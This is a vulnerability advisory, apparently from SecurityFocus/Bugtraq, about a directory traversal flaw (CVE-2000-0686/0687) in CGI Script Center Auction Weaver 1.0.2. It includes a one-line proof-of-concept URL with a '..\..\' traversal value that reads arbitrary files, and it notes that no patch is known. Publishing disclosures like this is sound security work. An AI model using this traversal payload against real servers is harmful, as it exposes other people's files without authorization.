CGI Script Center Auction Weaver Directory Traversal Vulnerability
BID:1630
Info
CGI Script Center Auction Weaver Directory Traversal Vulnerability
| Bugtraq ID: | 1630 |
| Class: | Access Validation Error |
| CVE: |
CVE-2000-0686 CVE-2000-0687 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Aug 23 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | Posted to Bugtraq by Meliksah Ozoral <[email protected]> on August 23, 2000. |
| Vulnerable: |
CGI Script Center Auction Weaver 1.0.2 |
| Not Vulnerable: | |
Discussion
CGI Script Center Auction Weaver Directory Traversal Vulnerability
It is possible to view the contents of any known file residing on a system running CGI Script Center Auction Weaver. For example:
http://target/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\&fromfile=file.ext
will allow a remote user, regardless of privilege level to read the file specified.
It is possible to view the contents of any known file residing on a system running CGI Script Center Auction Weaver. For example:
http://target/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\&fromfile=file.ext
will allow a remote user, regardless of privilege level to read the file specified.
Exploit / POC
CGI Script Center Auction Weaver Directory Traversal Vulnerability
See discussion.
See discussion.
Solution / Fix
CGI Script Center Auction Weaver Directory Traversal Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
CGI Script Center Auction Weaver Directory Traversal Vulnerability
References:
References:
- Auction Weaver Product Homepage (CGI Script Center)